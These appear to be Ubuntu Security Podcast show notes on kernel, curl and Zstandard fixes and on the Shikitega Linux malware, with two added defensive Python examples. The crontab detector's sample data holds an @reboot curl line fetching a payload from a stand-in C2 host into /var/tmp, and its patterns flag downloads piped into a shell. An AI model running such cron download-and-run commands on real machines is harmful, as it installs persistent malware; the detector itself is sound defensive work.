Overview
On this week’s episode we dive into the Shikitega Linux malware report from AT&T
Alien Labs, plus we cover security updates for the Linux kernel, curl and
Zstandard as well as some open positions on the team. Join us!
This week in Ubuntu Security Updates
13 unique CVEs addressed
- 2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
- OOB write in virtual terminal driver when changing VGA console fonts
- Improper control flow management in Intel 10GbE PCIe driver - local DoS
[USN-5594-1, USN-5599-1] Linux kernel (+ Oracle) vulnerabilities [01:28]
- 9 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
- Above issues plus:
- NULL pointer deref in KVM on host if a VM tried to execute an illegal instruction
- OOB write in UDF file-system driver
- UAF in NTFS under certain error conditions
- OOB write in Intel SMBus host controller driver
- Race condition in handling of pipe buffers -> OOB
[USN-5587-1] curl vulnerability [02:12]
- 1 CVE addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
- Cookies generally contain NAME=VALUE pairs using ASCII chars for both
- ASCII character set contains the usual A-Za-z0-9 and punctuation (space, ", !, #, & etc)
plus a bunch of control codes - NUL, BEL, LF, CR, HT (\t) and more
- These have a byte value below 32
- curl since 4.9 would accept cookies with control codes
- As with cookies, these get sent back to the server on subsequent requests
- Over time web servers have started rejecting cookies with control codes and
returning an HTTP 400 response code (Bad Request)
- As such, a malicious "sister site" could return a cookie with control codes
inside it; curl would then send that cookie to other sites in the same domain,
which would reject every such request and effectively DoS the user
- Fixed to have curl validate and reject such cookies in the first place
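To make the "sister site" scenario concrete, here is an added example (not from the podcast and not curl's own code) of a minimal cookie jar that applies the same kind of validation curl adopted: cookies whose name or value carry ASCII control codes (byte values below 32, plus DEL) are rejected at storage time instead of being replayed to every host in the domain. The hostnames, cookie headers and the `example.test` domain are constructed samples; the strict-server model is an assumption that any control code in the Cookie header yields a 400.

```python
# Added example (not from the podcast or from curl's own code): a cookie jar
# that rejects cookies carrying ASCII control codes, so a poisoned cookie set by
# one host cannot make later requests to sibling hosts fail with 400 Bad Request.
# All hostnames and headers below are constructed samples.

# ASCII control characters: NUL..US (0-31) plus DEL (127)
CONTROL_CHARS = {chr(c) for c in range(32)} | {chr(127)}


def has_control_chars(text: str) -> bool:
    """True if any character in the string is an ASCII control code."""
    return any(ch in CONTROL_CHARS for ch in text)


def parse_set_cookie(header: str):
    """Return (name, value) from a Set-Cookie header, ignoring attributes such
    as Path or Domain, or None if there is no NAME=VALUE pair. Only spaces are
    stripped so that a tab (HT) at either end is still detected."""
    pair = header.split(";", 1)[0]
    if "=" not in pair:
        return None
    name, value = pair.split("=", 1)
    return name.strip(" "), value.strip(" ")


def validate_cookie(header: str):
    """Return (accepted, reason) for a Set-Cookie header."""
    parsed = parse_set_cookie(header)
    if parsed is None:
        return False, "no NAME=VALUE pair"
    name, value = parsed
    if not name:
        return False, "empty name"
    if has_control_chars(name) or has_control_chars(value):
        return False, "control characters in cookie"
    return True, "ok"


class CookieJar:
    """Minimal jar keyed by domain: a cookie set for a domain is sent to every
    host in it, which is what turns one poisoned cookie into a cross-site DoS."""

    def __init__(self, validate: bool = True):
        self.validate = validate
        self.rejected = []   # (domain, header, reason) kept for logging/audit
        self._store = {}     # domain -> {name: value}

    def store(self, domain: str, header: str) -> bool:
        """Store a Set-Cookie header for a domain (the Domain attribute is
        passed explicitly here). Returns False if the cookie was rejected."""
        parsed = parse_set_cookie(header)
        if parsed is None:
            self.rejected.append((domain, header, "no NAME=VALUE pair"))
            return False
        if self.validate:
            accepted, reason = validate_cookie(header)
            if not accepted:
                self.rejected.append((domain, header, reason))
                return False
        name, value = parsed
        self._store.setdefault(domain, {})[name] = value
        return True

    def cookie_header(self, host: str) -> str:
        """Build the Cookie request header for a host from all matching domains."""
        parts = []
        for domain, cookies in self._store.items():
            if host == domain or host.endswith("." + domain):
                parts.extend(f"{n}={v}" for n, v in cookies.items())
        return "; ".join(parts)


def request_would_be_rejected(cookie_header: str) -> bool:
    """Model of a strict server (assumption): any control code in the Cookie
    header makes it answer 400 Bad Request."""
    return has_control_chars(cookie_header)


def demo(validate: bool) -> bool:
    """Replay the scenario: one host in example.test sets a cookie with a BEL
    byte inside, then the user visits shop.example.test. Returns True if that
    later request would be rejected with a 400."""
    jar = CookieJar(validate=validate)
    jar.store("example.test", "session=abc123; Path=/")
    jar.store("example.test", "poison=bad\x07value; Domain=example.test")
    return request_would_be_rejected(jar.cookie_header("shop.example.test"))
```

Running `demo(validate=False)` reproduces the pre-fix behaviour (the sibling host's request fails), while `demo(validate=True)` shows the fixed behaviour: the poisoned cookie is never stored, and `jar.rejected` keeps a record of what was dropped and why, which is the useful thing to log on a client.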
[USN-5593-1] Zstandard vulnerability [04:34]
Goings on in Ubuntu Security Community
AT&T Alien Labs teardown of Shikitega Linux malware [05:40]
- https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux
- Targets endpoints and IoT devices running Linux
- Uses multiple different binaries to achieve its purpose - each does one task
of the process
- Uses various components of Metasploit along the way
- Framework containing various exploits plus different tools to help develop
exploits as well as scan environments etc
- Initial dropper is a very small binary that is encoded using one of the
standard Metasploit encoders to help it evade detection from AV scanners etc
- Decodes basic shellcode to open a socket to the C2 server and downloads
additional shellcode to run plus the mettle interpreter so that it can make
use of off-the-shelf components from Metasploit in further stages
- Also downloads the next stage dropper
- This again is encoded the same as the first component - contained within is
shellcode to spawn a shell via /bin/sh
- From this shell it then attempts to run commands to exploit two known privesc
vulns - CVE-2021-4034 ([USN-5252-1, USN-5252-2] PolicyKit vulnerability from
Episode 147) and CVE-2021-3493 ([USN-4916-2] Linux kernel vulnerability in
Episode 113)
- Once it has gained root privileges via these vulns, it then moves on to achieve
persistence and execute the primary payload - a cryptominer
- Persistence is achieved simply by using cron to download the cryptominer from
C2 on boot - and then another cron job to execute the cryptominer - and this
is done for both the standard user and root
- As such the only traces left on the machine after a reboot are the crontabs
- The cryptominer is XMRig, configured to mine Monero
- C2 is seemingly fronted by Cloudflare and CloudFront
- No details provided on the initial compromise, but it is good to see details on the
privesc vulns - both of these were patched in Ubuntu quite a while ago - and
we released a Livepatch for the kernel privesc too - shows the value of such
services - you can stay protected against the kind of vulnerabilities that
attackers are actually exploiting without needing to reboot
- Shows the increasing prevalence of Linux malware (and the resulting interest
in it from organisations like AT&T) but also the value in ensuring systems are
kept updated
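Since the persistence described above leaves crontabs as the only on-disk trace, here is an added example (not from the AT&T report or its authors) of a detector for that pattern: it parses crontab text and flags @reboot jobs that fetch something over the network, jobs that pipe a download straight into a shell, and jobs that run out of a temporary directory. The crontab lines, the `c2.example.invalid` host and the file names are constructed samples, not indicators from the report.

```python
# Added example, not from the AT&T report: a detector for cron-based
# download-and-run persistence. The crontab lines and hostnames below are
# constructed samples, not indicators taken from the report.
import re

DOWNLOADERS = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|da|z)?sh\b")
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def parse_crontab(text: str):
    """Yield (line_no, schedule, command) for each job line of a per-user
    crontab. Comments, blank lines and VAR=value environment lines are
    skipped; both the five-field schedule and @-shortcuts such as @reboot
    are understood."""
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if "=" in first and not first.startswith("@"):
            continue  # environment assignment such as MAILTO=root
        if line.startswith("@"):
            parts = line.split(None, 1)
            if len(parts) == 2:
                yield line_no, parts[0], parts[1]
            continue
        parts = line.split(None, 5)
        if len(parts) == 6:
            yield line_no, " ".join(parts[:5]), parts[5]


def classify(schedule: str, command: str):
    """Return the reasons a job looks like download-and-run persistence
    (empty list for a job that matches nothing)."""
    reasons = []
    downloads = bool(DOWNLOADERS.search(command))
    if schedule == "@reboot" and downloads:
        reasons.append("fetches from the network at every boot")
    if downloads and PIPE_TO_SHELL.search(command):
        reasons.append("pipes a download into a shell")
    if any(d in command for d in TEMP_DIRS):
        reasons.append("reads or runs from a temporary directory")
    return reasons


def scan_crontab(text: str, owner: str = "unknown"):
    """Return findings as dicts. Run it once per user and once for root, since
    the persistence described here is installed for both."""
    findings = []
    for line_no, schedule, command in parse_crontab(text):
        reasons = classify(schedule, command)
        if reasons:
            findings.append({"owner": owner, "line": line_no,
                             "schedule": schedule, "command": command,
                             "reasons": reasons})
    return findings


# Constructed sample crontab: two benign jobs and two that match the pattern.
SAMPLE_CRONTAB = """\
# constructed sample, not a real crontab
MAILTO=root
0 3 * * * /usr/bin/apt-get update
@reboot curl -s http://c2.example.invalid/stage -o /var/tmp/.x
@reboot /var/tmp/.x --config /var/tmp/.cfg
*/5 * * * * /usr/local/bin/backup.sh
"""

if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB, owner="root"):
        print(f"{f['owner']} line {f['line']}: {f['command']}"
              f"  <- {', '.join(f['reasons'])}")
```

On Ubuntu the per-user crontabs live under /var/spool/cron/crontabs (readable only by root), and `crontab -l -u <user>` prints each one, so feeding every user's output through `scan_crontab` covers both the unprivileged and the root persistence at once. System-wide jobs in /etc/crontab and /etc/cron.d carry an extra user field after the schedule, which this per-user parser does not handle; strip that field first if you point it at those files.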
systemd/open-vm-tools regression for Ubuntu 18.04 LTS [10:56]
- Had mentioned last week that I would likely cover this - is still a
work-in-progress so hopefully next week 🤞
Hiring [11:30]
Get in contact